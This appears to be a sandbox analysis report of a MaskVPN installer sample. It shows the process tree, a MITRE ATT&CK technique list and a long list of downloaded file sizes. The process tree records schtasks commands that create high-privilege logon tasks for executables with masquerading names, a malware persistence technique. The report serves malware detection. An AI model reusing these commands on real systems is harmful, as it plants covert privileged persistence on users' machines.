C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\ProgramData\68\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\WindowsShell\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SHabinuliju" /sc ONLOGON /tr "'C:\ProgramData\ssh\SHabinuliju.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\notepad\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 436 -p 2956 -ip 29561⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2956 -s 16801⤵
- Program crash
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\explorer.exeexplorer.exe /LOADSAVEDWINDOWS2⤵
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1File Deletion
1Install Root Certificate
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
80KB
-
Filesize
188KB
-
Filesize
100KB
-
Filesize
72KB
-
Filesize
64KB
-
Filesize
472KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
192KB
-
Filesize
628KB
-
Filesize
192KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.1MB
-
Filesize
4KB
-
Filesize
5.6MB
-
Filesize
4KB
-
Filesize
312KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
1.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
40KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
112KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
188KB
-
Filesize
36KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
5.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
12KB
-
Filesize
832KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
108KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
88KB
-
Filesize
8KB
-
Filesize
828KB
-
Filesize
444KB
-
Filesize
6.1MB
-
Filesize
436KB
-
Filesize
36KB
-
Filesize
80KB
-
Filesize
1.2MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
240KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB